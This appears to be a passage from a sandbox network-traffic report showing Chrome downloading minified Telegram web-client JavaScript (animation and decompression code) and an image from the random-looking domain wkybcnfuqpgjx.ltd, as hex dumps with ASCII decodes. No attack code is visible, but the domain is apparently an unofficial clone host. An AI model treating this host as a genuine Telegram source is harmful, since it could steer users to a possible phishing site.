                                  2025-01-12 00:03:46 UTC1369INData Raw: 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 72 29 7d 2c 69 7d 28 65 29 3b 72 65 74 75 72 6e 7b 77 6f 72 6b 65 72 3a 65 2c 63 6f 6e 6e 65 63 74 6f 72 3a 74 7d 7d 29 29 29 2c 6d 29 29 2e 6d 61 70 28 28 65 3d 3e 7b 6c 65 74 7b 63 6f 6e 6e 65 63 74 6f 72 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 20 74 7d 29 29 2c 46 3d 6e 65 77 20 4d 61 70 2c 43 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 62 3d 2d 31 3b 63 6c 61 73 73 20 4d 7b 73 74 61 74 69 63 20 69 6e 69 74 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 73 3d 30 3b 73 3c 65 3b 73 2b 2b 29 74 5b 73 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 3b 63 6f 6e 73 74 5b 2c 69 2c 72 2c 61 2c 6f 3d 28 30 2c 6e 2e 41 29 28 29
                                  Data Ascii: stener("message",r)},i}(e);return{worker:e,connector:t}}))),m)).map((e=>{let{connector:t}=e;return t})),F=new Map,C=new WeakMap;let b=-1;class M{static init(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];const[,i,r,a,o=(0,n.A)()
                                  2025-01-12 00:03:46 UTC1369INData Raw: 76 69 65 77 73 2e 67 65 74 28 65 29 3b 69 3f 73 2e 63 6c 65 61 72 52 65 63 74 28 72 2e 78 2c 72 2e 79 2c 74 68 69 73 2e 69 6d 67 53 69 7a 65 2c 74 68 69 73 2e 69 6d 67 53 69 7a 65 29 3a 74 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 76 69 65 77 73 2e 64 65 6c 65 74 65 28 65 29 2c 74 68 69 73 2e 76 69 65 77 73 2e 73 69 7a 65 7c 7c 74 68 69 73 2e 64 65 73 74 72 6f 79 28 29 7d 69 73 50 6c 61 79 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 41 6e 69 6d 61 74 69 6e 67 7c 7c 74 68 69 73 2e 69 73 57 61 69 74 69 6e 67 7d 70 6c 61 79 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2c 74 3d 61 72 67 75 6d 65
                                  Data Ascii: views.get(e);i?s.clearRect(r.x,r.y,this.imgSize,this.imgSize):t.remove(),this.views.delete(e),this.views.size||this.destroy()}isPlaying(){return this.isAnimating||this.isWaiting}play(){let e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],t=argume
                                  2025-01-12 00:03:46 UTC1369INData Raw: 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 5d 3b 69 66 28 61 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 63 61 6c 63 53 69 7a 65 46 61 63 74 6f 72 28 29 3b 5b 6e 2c 6f 5d 3d 50 28 69 2c 65 29 2c 72 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 6e 2c 6f 29 2c 69 2e 64 61 74 61 73 65 74 2e 69 73 4a 75 73 74 43 6c 65 61 6e 65 64 3d 22 74 72 75 65 22 2c 28 30 2c 70 2e 59 53 29 28 28 28 29 3d 3e 7b 69 2e 64 61 74 61 73 65 74 2e 69 73 4a 75 73 74 43 6c 65 61 6e 65 64 3d 22 66 61 6c 73 65 22 7d 29 29 7d 73 2e 63 6f 6f 72 64 73 3d 7b 78 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 28 74 3f 2e 78 7c 7c 30 29 2a 6e 29 2c 79 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 28 74 3f 2e 79 7c 7c 30 29 2a 6f 29 7d 3b 63 6f 6e 73 74 20 68 3d 74 68 69 73 2e 67 65 74 46 72 61 6d 65 28 74 68 69
                                  Data Ascii: width,i.height];if(a){const e=this.calcSizeFactor();[n,o]=P(i,e),r.clearRect(0,0,n,o),i.dataset.isJustCleaned="true",(0,p.YS)((()=>{i.dataset.isJustCleaned="false"}))}s.coords={x:Math.round((t?.x||0)*n),y:Math.round((t?.y||0)*o)};const h=this.getFrame(thi
                                  2025-01-12 00:03:46 UTC1369INData Raw: 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 2a 73 2c 31 29 7d 64 65 73 74 72 6f 79 28 29 7b 74 68 69 73 2e 69 73 44 65 73 74 72 6f 79 65 64 3d 21 30 2c 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 63 6c 65 61 72 43 61 63 68 65 28 29 2c 74 68 69 73 2e 64 65 73 74 72 6f 79 52 65 6e 64 65 72 65 72 28 29 2c 46 2e 64 65 6c 65 74 65 28 74 68 69 73 2e 72 65 6e 64 65 72 49 64 29 7d 63 6c 65 61 72 43 61 63 68 65 28 29 7b 74 68 69 73 2e 66 72 61 6d 65 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 26 26 65 21 3d 3d 66 26 26 65 2e 63 6c 6f 73 65 28 29 7d 29 29 2c 74 68 69 73 2e 69 6d 61 67 65 44 61 74 61 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 66 72 61 6d 65 73 3d 5b 5d 7d 69 6e 69 74 43 6f
                                  Data Ascii: turn Math.max(window.devicePixelRatio*s,1)}destroy(){this.isDestroyed=!0,this.pause(),this.clearCache(),this.destroyRenderer(),F.delete(this.renderId)}clearCache(){this.frames.forEach((e=>{e&&e!==f&&e.close()})),this.imageData=void 0,this.frames=[]}initCo
                                  2025-01-12 00:03:46 UTC1369INData Raw: 28 74 68 69 73 2e 76 69 65 77 73 2e 76 61 6c 75 65 73 28 29 29 2e 65 76 65 72 79 28 28 65 3d 3e 7b 6c 65 74 7b 69 73 4c 6f 61 64 65 64 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 20 74 7d 29 29 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 65 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 61 70 70 72 6f 78 46 72 61 6d 65 49 6e 64 65 78 29 2c 74 3d 74 68 69 73 2e 67 65 74 46 72 61 6d 65 28 65 29 3b 69 66 28 21 74 7c 7c 74 3d 3d 3d 66 29 72 65 74 75 72 6e 20 74 7c 7c 74 68 69 73 2e 72 65 71 75 65 73 74 46 72 61 6d 65 28 65 29 2c 74 68 69 73 2e 69 73 41 6e 69 6d 61 74 69 6e 67 3d 21 31 2c 74 68 69 73 2e 69 73 57 61 69 74 69 6e 67 3d 21 30 2c 21 31 3b 74 68 69 73 2e 63 61 63 68 65 4d 6f 64 75 6c 6f 26 26 65 25 74 68 69 73 2e 63 61 63 68 65 4d 6f 64 75 6c 6f 3d
                                  Data Ascii: (this.views.values()).every((e=>{let{isLoaded:t}=e;return t})))return!1;const e=Math.round(this.approxFrameIndex),t=this.getFrame(e);if(!t||t===f)return t||this.requestFrame(e),this.isAnimating=!1,this.isWaiting=!0,!1;this.cacheModulo&&e%this.cacheModulo=
                                  2025-01-12 00:03:46 UTC673INData Raw: 69 6d 61 74 69 6e 67 3d 21 31 2c 21 31 29 7d 29 2c 70 2e 52 4b 29 29 29 7d 67 65 74 46 72 61 6d 65 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 72 61 6d 65 73 5b 65 5d 7d 72 65 71 75 65 73 74 46 72 61 6d 65 28 65 29 7b 74 68 69 73 2e 66 72 61 6d 65 73 5b 65 5d 3d 66 2c 49 5b 74 68 69 73 2e 77 6f 72 6b 65 72 49 6e 64 65 78 5d 2e 72 65 71 75 65 73 74 28 7b 6e 61 6d 65 3a 22 72 6c 6f 74 74 69 65 3a 72 65 6e 64 65 72 46 72 61 6d 65 73 22 2c 61 72 67 73 3a 5b 74 68 69 73 2e 72 65 6e 64 65 72 49 64 2c 65 2c 74 68 69 73 2e 6f 6e 46 72 61 6d 65 4c 6f 61 64 2e 62 69 6e 64 28 74 68 69 73 29 5d 7d 29 7d 63 6c 65 61 6e 75 70 50 72 65 76 46 72 61 6d 65 28 65 29 7b 69 66 28 74 68 69 73 2e 66 72 61 6d 65 73 43 6f 75 6e 74 3c 33 29 72 65 74 75 72 6e 3b 63 6f 6e 73
                                  Data Ascii: imating=!1,!1)}),p.RK)))}getFrame(e){return this.frames[e]}requestFrame(e){this.frames[e]=f,I[this.workerIndex].request({name:"rlottie:renderFrames",args:[this.renderId,e,this.onFrameLoad.bind(this)]})}cleanupPrevFrame(e){if(this.framesCount<3)return;cons
                                  2025-01-12 00:03:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.649812172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:46 UTC369OUTGET /7784.df07a876b22e3b2a83e9.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:46 UTC924INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:46 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-53e5"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6953
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jveb%2F9J4UfuMGFM84Ixjqma3uhG83U6T4wZiVrUtkawfSACbqYlPaC9PPe6GkoTipLE3shFNQmrHRVPXFMCu3c4MP4Gw9ild46Lg2S2DN0X%2Fs3%2FkmI0Sa4%2BLTugV4OgYIAH9lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a7b86c0f3e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1520&rtt_var=577&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=947&delivery_rate=1885087&cwnd=217&unsent_bytes=0&cid=6b7d1c936e6b703e&ts=149&x=0"
                                  2025-01-12 00:03:46 UTC445INData Raw: 35 33 65 35 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 37 37 38 34 2e 64 66 30 37 61 38 37 36 62 32 32 65 33 62 32 61 38 33 65 39 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 37 38 34 5d 2c 7b 37 37 38 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 28 65 2c 74 2c 69 2c 6e 29 3d 3e 7b 6c 65 74 20 61 3d 36 35 35 33 35 26 65 2c 72 3d 65 3e 3e 3e 31 36 26 36 35 35 33
                                  Data Ascii: 53e5/*! For license information please see 7784.df07a876b22e3b2a83e9.js.LICENSE.txt */(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[7784],{7784:function(e,t){!function(e){"use strict";var t=(e,t,i,n)=>{let a=65535&e,r=e>>>16&6553
                                  2025-01-12 00:03:46 UTC1369INData Raw: 3b 6e 2b 2b 29 65 3d 31 26 65 3f 33 39 38 38 32 39 32 33 38 34 5e 65 3e 3e 3e 31 3a 65 3e 3e 3e 31 3b 74 5b 69 5d 3d 65 7d 72 65 74 75 72 6e 20 74 7d 29 28 29 29 3b 76 61 72 20 6e 3d 28 65 2c 74 2c 6e 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 69 2c 73 3d 61 2b 6e 3b 65 5e 3d 2d 31 3b 66 6f 72 28 6c 65 74 20 69 3d 61 3b 69 3c 73 3b 69 2b 2b 29 65 3d 65 3e 3e 3e 38 5e 72 5b 32 35 35 26 28 65 5e 74 5b 69 5d 29 5d 3b 72 65 74 75 72 6e 7e 65 7d 3b 63 6f 6e 73 74 20 61 3d 31 36 32 30 39 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 69 2c 6e 2c 72 2c 73 2c 6f 2c 6c 2c 64 2c 66 2c 68 2c 63 2c 75 2c 77 2c 62 2c 6d 2c 6b 2c 5f 2c 67 2c 70 2c 76 2c 78 2c 79 2c 45 2c 52 2c 41 3b 63 6f 6e 73 74 20 5a 3d 65 2e 73 74 61 74 65 3b 69 3d 65 2e
                                  Data Ascii: ;n++)e=1&e?3988292384^e>>>1:e>>>1;t[i]=e}return t})());var n=(e,t,n,a)=>{const r=i,s=a+n;e^=-1;for(let i=a;i<s;i++)e=e>>>8^r[255&(e^t[i])];return~e};const a=16209;var r=function(e,t){let i,n,r,s,o,l,d,f,h,c,u,w,b,m,k,_,g,p,v,x,y,E,R,A;const Z=e.state;i=e.
                                  2025-01-12 00:03:46 UTC1369INData Raw: 68 69 6c 65 28 2d 2d 70 29 3b 79 3d 72 2d 78 2c 45 3d 41 7d 7d 7d 65 6c 73 65 20 69 66 28 79 2b 3d 68 2d 70 2c 70 3c 76 29 7b 76 2d 3d 70 3b 64 6f 7b 41 5b 72 2b 2b 5d 3d 63 5b 79 2b 2b 5d 7d 77 68 69 6c 65 28 2d 2d 70 29 3b 79 3d 72 2d 78 2c 45 3d 41 7d 66 6f 72 28 3b 76 3e 32 3b 29 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 76 2d 3d 33 3b 76 26 26 28 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 2c 76 3e 31 26 26 28 41 5b 72 2b 2b 5d 3d 45 5b 79 2b 2b 5d 29 29 7d 65 6c 73 65 7b 79 3d 72 2d 78 3b 64 6f 7b 41 5b 72 2b 2b 5d 3d 41 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 41 5b 79 2b 2b 5d 2c 41 5b 72 2b 2b 5d 3d 41 5b 79 2b 2b 5d 2c 76 2d 3d 33 7d 77 68 69 6c 65 28 76 3e 32 29 3b 76
                                  Data Ascii: hile(--p);y=r-x,E=A}}}else if(y+=h-p,p<v){v-=p;do{A[r++]=c[y++]}while(--p);y=r-x,E=A}for(;v>2;)A[r++]=E[y++],A[r++]=E[y++],A[r++]=E[y++],v-=3;v&&(A[r++]=E[y++],v>1&&(A[r++]=E[y++]))}else{y=r-x;do{A[r++]=A[y++],A[r++]=A[y++],A[r++]=A[y++],v-=3}while(v>2);v
                                  2025-01-12 00:03:46 UTC1369INData Raw: 3c 79 26 26 30 3d 3d 3d 55 5b 78 5d 3b 78 2b 2b 29 3b 66 6f 72 28 45 3c 78 26 26 28 45 3d 78 29 2c 5a 3d 31 2c 70 3d 31 3b 70 3c 3d 73 3b 70 2b 2b 29 69 66 28 5a 3c 3c 3d 31 2c 5a 2d 3d 55 5b 70 5d 2c 5a 3c 30 29 72 65 74 75 72 6e 2d 31 3b 69 66 28 5a 3e 30 26 26 28 30 3d 3d 3d 65 7c 7c 31 21 3d 3d 79 29 29 72 65 74 75 72 6e 2d 31 3b 66 6f 72 28 44 5b 31 5d 3d 30 2c 70 3d 31 3b 70 3c 73 3b 70 2b 2b 29 44 5b 70 2b 31 5d 3d 44 5b 70 5d 2b 55 5b 70 5d 3b 66 6f 72 28 76 3d 30 3b 76 3c 6e 3b 76 2b 2b 29 30 21 3d 3d 74 5b 69 2b 76 5d 26 26 28 68 5b 44 5b 74 5b 69 2b 76 5d 5d 2b 2b 5d 3d 76 29 3b 69 66 28 30 3d 3d 3d 65 3f 28 4f 3d 4e 3d 68 2c 67 3d 32 30 29 3a 31 3d 3d 3d 65 3f 28 4f 3d 6f 2c 4e 3d 6c 2c 67 3d 32 35 37 29 3a 28 4f 3d 64 2c 4e 3d 66 2c 67 3d 30
                                  Data Ascii: <y&&0===U[x];x++);for(E<x&&(E=x),Z=1,p=1;p<=s;p++)if(Z<<=1,Z-=U[p],Z<0)return-1;if(Z>0&&(0===e||1!==y))return-1;for(D[1]=0,p=1;p<s;p++)D[p+1]=D[p]+U[p];for(v=0;v<n;v++)0!==t[i+v]&&(h[D[t[i+v]]++]=v);if(0===e?(O=N=h,g=20):1===e?(O=o,N=l,g=257):(O=d,N=f,g=0
                                  2025-01-12 00:03:46 UTC1369INData Raw: 5a 3d 31 36 31 39 32 2c 53 3d 31 36 31 39 34 2c 54 3d 31 36 31 39 39 2c 4f 3d 31 36 32 30 30 2c 55 3d 31 36 32 30 36 2c 44 3d 31 36 32 30 39 2c 43 3d 65 3d 3e 28 65 3e 3e 3e 32 34 26 32 35 35 29 2b 28 65 3e 3e 3e 38 26 36 35 32 38 30 29 2b 28 28 36 35 32 38 30 26 65 29 3c 3c 38 29 2b 28 28 32 35 35 26 65 29 3c 3c 32 34 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 74 68 69 73 2e 73 74 72 6d 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 6f 64 65 3d 30 2c 74 68 69 73 2e 6c 61 73 74 3d 21 31 2c 74 68 69 73 2e 77 72 61 70 3d 30 2c 74 68 69 73 2e 68 61 76 65 64 69 63 74 3d 21 31 2c 74 68 69 73 2e 66 6c 61 67 73 3d 30 2c 74 68 69 73 2e 64 6d 61 78 3d 30 2c 74 68 69 73 2e 63 68 65 63 6b 3d 30 2c 74 68 69 73 2e 74 6f 74 61 6c 3d 30 2c 74 68 69 73 2e 68 65 61 64 3d 6e 75 6c
                                  Data Ascii: Z=16192,S=16194,T=16199,O=16200,U=16206,D=16209,C=e=>(e>>>24&255)+(e>>>8&65280)+((65280&e)<<8)+((255&e)<<24);function I(){this.strm=null,this.mode=0,this.last=!1,this.wrap=0,this.havedict=!1,this.flags=0,this.dmax=0,this.check=0,this.total=0,this.head=nul
                                  2025-01-12 00:03:46 UTC1369INData Raw: 2c 69 2e 73 74 72 6d 3d 65 2c 69 2e 77 69 6e 64 6f 77 3d 6e 75 6c 6c 2c 69 2e 6d 6f 64 65 3d 45 3b 63 6f 6e 73 74 20 6e 3d 46 28 65 2c 74 29 3b 72 65 74 75 72 6e 20 6e 21 3d 3d 6d 26 26 28 65 2e 73 74 61 74 65 3d 6e 75 6c 6c 29 2c 6e 7d 3b 6c 65 74 20 4d 2c 48 2c 6a 3d 21 30 3b 63 6f 6e 73 74 20 4b 3d 65 3d 3e 7b 69 66 28 6a 29 7b 4d 3d 6e 65 77 20 49 6e 74 33 32 41 72 72 61 79 28 35 31 32 29 2c 48 3d 6e 65 77 20 49 6e 74 33 32 41 72 72 61 79 28 33 32 29 3b 6c 65 74 20 74 3d 30 3b 66 6f 72 28 3b 74 3c 31 34 34 3b 29 65 2e 6c 65 6e 73 5b 74 2b 2b 5d 3d 38 3b 66 6f 72 28 3b 74 3c 32 35 36 3b 29 65 2e 6c 65 6e 73 5b 74 2b 2b 5d 3d 39 3b 66 6f 72 28 3b 74 3c 32 38 30 3b 29 65 2e 6c 65 6e 73 5b 74 2b 2b 5d 3d 37 3b 66 6f 72 28 3b 74 3c 32 38 38 3b 29 65 2e 6c
                                  Data Ascii: ,i.strm=e,i.window=null,i.mode=E;const n=F(e,t);return n!==m&&(e.state=null),n};let M,H,j=!0;const K=e=>{if(j){M=new Int32Array(512),H=new Int32Array(32);let t=0;for(;t<144;)e.lens[t++]=8;for(;t<256;)e.lens[t++]=9;for(;t<280;)e.lens[t++]=7;for(;t<288;)e.l
                                  2025-01-12 00:03:46 UTC1369INData Raw: 2e 6d 6f 64 65 3d 5a 3b 62 72 65 61 6b 7d 66 6f 72 28 3b 4e 3c 31 36 3b 29 7b 69 66 28 30 3d 3d 3d 66 29 62 72 65 61 6b 20 65 3b 66 2d 2d 2c 49 2b 3d 73 5b 6c 2b 2b 5d 3c 3c 4e 2c 4e 2b 3d 38 7d 69 66 28 32 26 61 2e 77 72 61 70 26 26 33 35 36 31 35 3d 3d 3d 49 29 7b 30 3d 3d 3d 61 2e 77 62 69 74 73 26 26 28 61 2e 77 62 69 74 73 3d 31 35 29 2c 61 2e 63 68 65 63 6b 3d 30 2c 24 5b 30 5d 3d 32 35 35 26 49 2c 24 5b 31 5d 3d 49 3e 3e 3e 38 26 32 35 35 2c 61 2e 63 68 65 63 6b 3d 6e 28 61 2e 63 68 65 63 6b 2c 24 2c 32 2c 30 29 2c 49 3d 30 2c 4e 3d 30 2c 61 2e 6d 6f 64 65 3d 31 36 31 38 31 3b 62 72 65 61 6b 7d 69 66 28 61 2e 68 65 61 64 26 26 28 61 2e 68 65 61 64 2e 64 6f 6e 65 3d 21 31 29 2c 21 28 31 26 61 2e 77 72 61 70 29 7c 7c 28 28 28 32 35 35 26 49 29 3c 3c
                                  Data Ascii: .mode=Z;break}for(;N<16;){if(0===f)break e;f--,I+=s[l++]<<N,N+=8}if(2&a.wrap&&35615===I){0===a.wbits&&(a.wbits=15),a.check=0,$[0]=255&I,$[1]=I>>>8&255,a.check=n(a.check,$,2,0),I=0,N=0,a.mode=16181;break}if(a.head&&(a.head.done=!1),!(1&a.wrap)||(((255&I)<<
                                  2025-01-12 00:03:46 UTC1369INData Raw: 66 28 30 3d 3d 3d 66 29 62 72 65 61 6b 20 65 3b 66 2d 2d 2c 49 2b 3d 73 5b 6c 2b 2b 5d 3c 3c 4e 2c 4e 2b 3d 38 7d 61 2e 6c 65 6e 67 74 68 3d 49 2c 61 2e 68 65 61 64 26 26 28 61 2e 68 65 61 64 2e 65 78 74 72 61 5f 6c 65 6e 3d 49 29 2c 35 31 32 26 61 2e 66 6c 61 67 73 26 26 34 26 61 2e 77 72 61 70 26 26 28 24 5b 30 5d 3d 32 35 35 26 49 2c 24 5b 31 5d 3d 49 3e 3e 3e 38 26 32 35 35 2c 61 2e 63 68 65 63 6b 3d 6e 28 61 2e 63 68 65 63 6b 2c 24 2c 32 2c 30 29 29 2c 49 3d 30 2c 4e 3d 30 7d 65 6c 73 65 20 61 2e 68 65 61 64 26 26 28 61 2e 68 65 61 64 2e 65 78 74 72 61 3d 6e 75 6c 6c 29 3b 61 2e 6d 6f 64 65 3d 31 36 31 38 35 3b 63 61 73 65 20 31 36 31 38 35 3a 69 66 28 31 30 32 34 26 61 2e 66 6c 61 67 73 26 26 28 4c 3d 61 2e 6c 65 6e 67 74 68 2c 4c 3e 66 26 26 28 4c
                                  Data Ascii: f(0===f)break e;f--,I+=s[l++]<<N,N+=8}a.length=I,a.head&&(a.head.extra_len=I),512&a.flags&&4&a.wrap&&($[0]=255&I,$[1]=I>>>8&255,a.check=n(a.check,$,2,0)),I=0,N=0}else a.head&&(a.head.extra=null);a.mode=16185;case 16185:if(1024&a.flags&&(L=a.length,L>f&&(L
                                  2025-01-12 00:03:46 UTC1369INData Raw: 61 2e 63 68 65 63 6b 3d 43 28 49 29 2c 49 3d 30 2c 4e 3d 30 2c 61 2e 6d 6f 64 65 3d 52 3b 63 61 73 65 20 52 3a 69 66 28 30 3d 3d 3d 61 2e 68 61 76 65 64 69 63 74 29 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 5f 6f 75 74 3d 64 2c 65 2e 61 76 61 69 6c 5f 6f 75 74 3d 63 2c 65 2e 6e 65 78 74 5f 69 6e 3d 6c 2c 65 2e 61 76 61 69 6c 5f 69 6e 3d 66 2c 61 2e 68 6f 6c 64 3d 49 2c 61 2e 62 69 74 73 3d 4e 2c 5f 3b 65 2e 61 64 6c 65 72 3d 61 2e 63 68 65 63 6b 3d 31 2c 61 2e 6d 6f 64 65 3d 41 3b 63 61 73 65 20 41 3a 69 66 28 69 3d 3d 3d 77 7c 7c 69 3d 3d 3d 62 29 62 72 65 61 6b 20 65 3b 63 61 73 65 20 5a 3a 69 66 28 61 2e 6c 61 73 74 29 7b 49 3e 3e 3e 3d 37 26 4e 2c 4e 2d 3d 37 26 4e 2c 61 2e 6d 6f 64 65 3d 55 3b 62 72 65 61 6b 7d 66 6f 72 28 3b 4e 3c 33 3b 29 7b 69 66 28
                                  Data Ascii: a.check=C(I),I=0,N=0,a.mode=R;case R:if(0===a.havedict)return e.next_out=d,e.avail_out=c,e.next_in=l,e.avail_in=f,a.hold=I,a.bits=N,_;e.adler=a.check=1,a.mode=A;case A:if(i===w||i===b)break e;case Z:if(a.last){I>>>=7&N,N-=7&N,a.mode=U;break}for(;N<3;){if(
                                  2025-01-12 00:03:46 UTC1369INData Raw: 64 65 2c 30 2c 61 2e 77 6f 72 6b 2c 65 65 29 2c 61 2e 6c 65 6e 62 69 74 73 3d 65 65 2e 62 69 74 73 2c 51 29 7b 65 2e 6d 73 67 3d 22 69 6e 76 61 6c 69 64 20 63 6f 64 65 20 6c 65 6e 67 74 68 73 20 73 65 74 22 2c 61 2e 6d 6f 64 65 3d 44 3b 62 72 65 61 6b 7d 61 2e 68 61 76 65 3d 30 2c 61 2e 6d 6f 64 65 3d 31 36 31 39 38 3b 63 61 73 65 20 31 36 31 39 38 3a 66 6f 72 28 3b 61 2e 68 61 76 65 3c 61 2e 6e 6c 65 6e 2b 61 2e 6e 64 69 73 74 3b 29 7b 66 6f 72 28 3b 56 3d 61 2e 6c 65 6e 63 6f 64 65 5b 49 26 28 31 3c 3c 61 2e 6c 65 6e 62 69 74 73 29 2d 31 5d 2c 6a 3d 56 3e 3e 3e 32 34 2c 59 3d 56 3e 3e 3e 31 36 26 32 35 35 2c 47 3d 36 35 35 33 35 26 56 2c 21 28 6a 3c 3d 4e 29 3b 29 7b 69 66 28 30 3d 3d 3d 66 29 62 72 65 61 6b 20 65 3b 66 2d 2d 2c 49 2b 3d 73 5b 6c 2b 2b
                                  Data Ascii: de,0,a.work,ee),a.lenbits=ee.bits,Q){e.msg="invalid code lengths set",a.mode=D;break}a.have=0,a.mode=16198;case 16198:for(;a.have<a.nlen+a.ndist;){for(;V=a.lencode[I&(1<<a.lenbits)-1],j=V>>>24,Y=V>>>16&255,G=65535&V,!(j<=N);){if(0===f)break e;f--,I+=s[l++


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.649813172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:46 UTC387OUTGET /chat-bg-pattern-light.ee148af944f6580293ae.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:46 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:46 GMT
                                  Content-Type: image/png
                                  Content-Length: 272875
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-429eb"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6954
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XuohruFSz82GkuU%2BBTS5xiWm3ikt83p1UouBHJdkHFp8MeiJN8nT3yGSB7L3df4fsZxLBOmOUIuE6K0EObOWjuHt10uME%2B8Eh6PilYvVL4IY7wDOLlHtVH6XBYUAp9wzrxS4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a7efc94217-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2272&min_rtt=2238&rtt_var=863&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=965&delivery_rate=1304736&cwnd=240&unsent_bytes=0&cid=bceae13ee080384b&ts=141&x=0"
